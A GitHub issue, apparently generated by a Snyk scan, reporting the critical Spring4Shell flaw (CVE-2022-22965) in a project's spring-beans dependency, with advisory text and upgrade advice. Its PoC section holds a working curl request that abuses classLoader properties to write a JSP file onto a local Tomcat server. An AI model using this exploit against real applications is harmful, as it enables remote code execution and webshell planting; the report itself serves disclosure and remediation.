Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

CVE-2022-22965 - critical detected in org.springframework:spring-beans #301

Open
Robthreefold opened this issue May 10, 2022 · 0 comments
Open

CVE-2022-22965 - critical detected in org.springframework:spring-beans #301

Robthreefold opened this issue May 10, 2022 · 0 comments

Comments

@Robthreefold
Copy link
Owner

Package Name: org.springframework:spring-beans
Package Version: ['5.2.19.RELEASE']
Package Manager: maven
Target File: todolist-core/pom.xml
Severity Level: critical
Snyk ID: SNYK-JAVA-ORGSPRINGFRAMEWORK-2436751
Snyk CVE: CVE-2022-22965
Snyk CWE: CWE-94
Link to issue in Snyk: https://app.snyk.io/org/rhicksiii91/project/deb9d3bf-7122-4824-acbf-cd302b957776

Snyk Description: ## Overview
org.springframework:spring-beans is a package that is the basis for Spring Framework's IoC container. The BeanFactory interface provides an advanced configuration mechanism capable of managing any type of object.

Affected versions of this package are vulnerable to Remote Code Execution via manipulation of ClassLoader that is achievable with a POST HTTP request. This could allow an attacker to execute a webshell on a victim's application (TomCat), or download arbitrary files from the server (Payara/Glassfish).

Note:

  • Current public exploits require victim applications to be built with JRE version 9 (or above) and to be deployed on either Tomcat, Payara or Glassfish.
  • However, we have confirmed that it is technically possible for additional exploits to work under additional application configurations as well.
  • As such while we recommend users prioritise first remediating against the configuration described above, for full protection we also recommend upgrading all vulnerable versions to the fixed spring-beans version regardless of the application configuration.

Update Log

  • 31/03/2022 - Severity was raised from 8.1 to 9.8
  • 08/04/2022 - Advisory was updated to reflect that Snyk's security research team was able to author a working PoC of this vulnerability against applications that are deployed on Payara (which is based on Glassfish).

PoC

1/ docker run -p 8888:8080 --rm --interactive --tty --name vm1 tomcat:9.0
2/ ./mvnw install
3/ docker cp target/handling-form-submission-complete.war vm1:/usr/local/tomcat/webapps
4/ curl -X POST \
  -H "pre:<%" \
  -H "post:;%>" \
  -F 'class.module.classLoader.resources.context.parent.pipeline.first.pattern=%{pre}iSystem.out.println(123)%{post}i' \
  -F 'class.module.classLoader.resources.context.parent.pipeline.first.suffix=.jsp' \
  -F 'class.module.classLoader.resources.context.parent.pipeline.first.directory=webapps/handling-form-submission-complete' \
  -F 'class.module.classLoader.resources.context.parent.pipeline.first.prefix=rce' \
  -F 'class.module.classLoader.resources.context.parent.pipeline.first.fileDateFormat=' \
  http://localhost:8888/handling-form-submission-complete/greeting
5/ curl http://localhost:8888/handling-form-submission-complete/rce.jsp

Remediation

Upgrade org.springframework:spring-beans to version 5.2.20, 5.3.18 or higher.

References
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Assignees
No one assigned
Labels
None yet
Projects
None yet
Milestone
No milestone
Development

No branches or pull requests
1 participant
@Robthreefold